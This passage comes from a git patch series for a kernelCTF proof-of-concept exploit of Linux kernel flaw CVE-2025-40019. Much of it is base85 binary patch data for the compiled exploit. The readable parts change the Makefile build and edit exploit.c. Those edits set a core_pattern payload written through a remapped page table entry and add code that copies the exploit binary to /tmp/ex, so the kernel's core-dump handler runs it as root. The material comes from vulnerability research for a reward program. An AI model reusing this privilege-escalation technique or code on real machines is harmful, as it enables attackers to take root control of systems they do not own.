zL+jkMX*nzIcZ<*6KdW>=%|)zyW|rD;N-+tC$rsAI6!sHqm^iJ5)_pf!ouQLSZ02j(@EWVA^BHQRWALizV-rv3w^*d+aQZ~Qd8u(TvCTSOS7$7V7E7YL z8YcK`i8|GtgV@BA8~Z_F;5^k5VPt|&l&d|_nY8Qzg3cG#P)Rs_7B{_zKm3GlClugH zI*6em(INjH6}*>4io9oW0lzb2gA*g40U!WA_+)@0_gw_2kt($AHrKA?@_0kqWlnwBG; za4R;HWCX>1M?BB8IfI(~E6(dF)+Xomk=8ip^-;F&yLicTDA37oI)p}?p(G{{YYrX@ zqm$BXz095r9&y~;c_YEv!+Aq%TWl=R1}v`n)v=F@rlWz!fg0qO%evbK8A_fL%+6ZD z=$Ub1cY?vu9-BW(@3`2gclf<}M=&OTK-k!GW>)@lv(pn?^@9yx99`y|}L#FB(SaTc!98<{-zp z$;a77TCgj$ofpeY_z5TTpjdXWsNOaPzhImBGX zo1J!SI>ebpqd(9u!i#|<*h>6g$hU*wrPaZO2&mM1en_QR?$@v`p+WhLwPDja@oy%D zx#yk3Z~oP7Cv)1WgLb*w<|Xz(I|(Y@ouS(-t3c|benbtE{EM4b;v`oCrh=xBK4Hcq zVFs4Pvf%2dg+#8wJA6&XZBgQ(JG7xL415>TMNvv0hvm1Ocs$hUdE1X2 zfk{^>We24KX7GnO{ilUc`4s3di;|dFMqT3 z!5*>8LRU~B3@easLZYu+u{EzVrGV6`^W8Q}w+>F8gT^6cp)%6;$Om%C?_ca3`QO}6 zEp>~{{;8$YAIiUZ<;8B4429LG;FVH2dD|&INxrsibi&<#J*vE&vhLN Date: Sat, 9 May 2026 13:06:57 -0400 Subject: [PATCH 7/9] Build exp505 repro artifact without debug layout --- .../exploit/mitigation-v4-6.12/Makefile | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index d01601dfd..a922ca238 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,11 +1,16 @@ CC ?= gcc -CFLAGS ?= -O2 -g -w -DMIT_612 +CFLAGS ?= -O2 -w -DMIT_612 +DEBUG_CFLAGS ?= -O2 -g -w -DMIT_612 LDFLAGS ?= -static all: exploit exploit: exploit.c - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS) + @if [ "$@" = "exploit_debug" ]; then \ + $(CC) -B/usr/bin/ $(DEBUG_CFLAGS) -o $@ $< $(LDFLAGS); \ + else \ + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ + fi clean: rm -f exploit exploit_debug From c4ef77f049a713fd33dd68b9f06d6c21993aa67d Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Sat, 9 May 2026 13:10:59 -0400 Subject: [PATCH 8/9] Normalize exp505 repro execution path --- .../exploit/mitigation-v4-6.12/exploit | Bin 39632 -> 44728 bytes .../exploit/mitigation-v4-6.12/exploit.c | 32 ++++++++++++++++-- 2 files changed, 29 insertions(+), 3 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit index 30afd6443cd57cc06efda75b3e9ff0683763d8b2..66dd8f1d1ac2ea2af01f048d873c2eab7f37e2d0 100755 GIT binary patch delta 14431 zcmb_@3wTUd_xCv`nKVe8xCcR^p^0lIq>U0XOgO^~QPNV<@|Kj|C^M=ToiG{A=@?CI zTJ=`x^`&~DA&tCbCPF4uHE2ug7Ii!6P@yexo$t5KnF;OpKJWkkJsGQz2ClPp@u%_{O@q19FK|Hc2zm;07R zf9P#M^v~@I5<(S!hra~t)2IP{>w5!~7p9QO-1_Bx~ia)#zHi-lp)5hEPoOTz>+nsad=pT?i^IvX6<_WmRk!!hDW7spLU zxv`1xP_VOMjh#}{6!4l|?6J5G5!ood;$pAHb&Z&h;`c80NnGcMcTx1Z*`B!0c9Ojl zXcDYA^={ci9bv-opxAMwls2Gx@IC`x8eF3u6N7vPjgNGQg~hGldlLMdIXJ|yM|f~l zrGu1?`kimU6&Dl3ydc9UN5m4{((pIJgsCL5vTEb2nQg{g0IH*aG~4j9L^gd60n~gSrI8%(vM~ojOE( zrWIGAxEIBZZ?m#aee9C{f+U}l+-bjm7q~4sPS-0C%efwq+>bE643Ig)(F@QC4ILylqmIBDVe^oKZ3l7BbIwEsRPG(?u+1f#f~jd z_UW(a4=7?X$2l4TVnGgS<;pzqqBl>pJG~bI0fHNYa4n$ZbJhURz3lykT6Y{ z4X?5bGC?a`3z}T%q1NRF46W<}tcCiI)%y7h404s(y`3zZ*GKG9pl%mjQ5ly>dYa|i z%B|U|^jF)OOy%FjU~4`|8^kY0V``3-=yi=Ay@LU&hhQ+^Fru)grE3`S8U;o{2~wl zXn@`TiUw%PfYE#c&;$dJOTgb^(Ey5YDAHg_DapNpisktz>jTQM{#2Vq7^fumL=cpp zL-F679it%gmH_+z)4Kpkf9rh;dUtJ4M;ax$ZTV$b&p74TSzvS7SigjO?J@8TOxuwR z*zrOWjyKCR%X@+T`??yPs|#U4F-g~FA3(A?$UJeDuFH49@WV(;Nvc23AeL;cX@)gK zEGZ1aWkFa>Ff(n=ewYYB}<&E0gYnGclfIiOO`v|)9?dg$!6!8&sk>IczaL-7KED! z%D#$=VPc7=CJNf7mJ+GX2os4V?tILrQLe90B2%3UQI@m5SJ9YM=OPuYQPJ2`r$a@n zE%KkHiVN|^)Xxh*u*mhM3MI*y>U07#%k_4tLP<$=E(RvaS%t=wOQwq7(v7KGUIPVc ze_RMCmN;dA!mMp#$@bT^iWM#mu3n-ttafYY_N9QOH8jz3R*_h;WC$_Qb=2#_9bX$*Ys*b z>T*qDPBrxpo8;_--Mel0rublD3qdHXEcYRjj|unx8)A85a=g&&}~594xzLQc$LCC zsIA(lMz1YIa@jV6Bd-y)+cpA!q!G7$22{F(t^+#Y4!RR)k2|OrXvaI~_duiWphZU4 zvo#=H>lYl6d>oiRgc;@E^j^Di^bUR&)!!1@l-8t&Nz!=Q`pcuSM9Ni?dwUVgq?yFcL+On0Xs-U~rGAjE`Hkvo}(osyORo_b`W z-~WfyLtXLjPCc}wg0`wqQn451U{Z0fQ4W-G`7lvraBnZ{76rTa!zLifRhW<=sjO-5 zxMmrY9H<8Rjp=)LYSyL^uTt>~ZA10%srar&e4dK0Zp25cxUCWIPI#215x?C;?XX)T z;Yap-pH9tg;XJ1)utmjxXvEzr{&^!lUB#V^c!rASHsWnmJgpJGz^3-?)GWFY-=*Sb zT8H{u&E&qFI&N>o7d1gf;{Kd`k@mfBy{w{d;^YxtLXTABiO=P1&J*WePRbKc?8y`T z)x>noqt>GQT+T+SO+oDr)PjFjbVsdLZTlJ3rr+K6TMsj�dcpdmLb4Ia>h0%Go~w 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 XQ>(i32KMHvc1@IE(@|{GsxJQrpvTXS delta 9589 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 fKYgMU!31W)KWh4I^ZIj9q diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c index c536824e9..cef78de98 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c @@ -44,6 +44,7 @@ #include #include #include +#include #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ @@ -474,9 +475,8 @@ static void sha256(const uint8_t *data, size_t datalen, uint8_t *hash_out) /* ESSIV sendmsg payload size */ #define ESSIV_SENDMSG_LEN 0x20 -/* core_pattern payload written through the remapped PTE. - * kernelCTF PR repro runs this artifact from /tmp/exp/exploit. */ -#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/exp/exploit %P" +/* core_pattern payload written through the remapped PTE */ +#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/ex %P" #define PUD_PROBE_COUNT 16 /* ------------------------------------------------------------------ */ @@ -526,6 +526,30 @@ static void pin_cpu(int cpu) sched_setaffinity(0, sizeof(mask), &mask); } +static void normalize_exec_path(char **argv) +{ + if (!strcmp(argv[0], "/tmp/ex") || getenv("EXP505_REEXEC")) + return; + + int in = open(argv[0], O_RDONLY); + if (in < 0) + return; + + int out = open("/tmp/ex", O_WRONLY | O_CREAT | O_TRUNC, 0755); + if (out >= 0) { + char buf[0x4000]; + ssize_t n; + while ((n = read(in, buf, sizeof(buf))) > 0) + if (write(out, buf, n) != n) + break; + close(out); + chmod("/tmp/ex", 0755); + 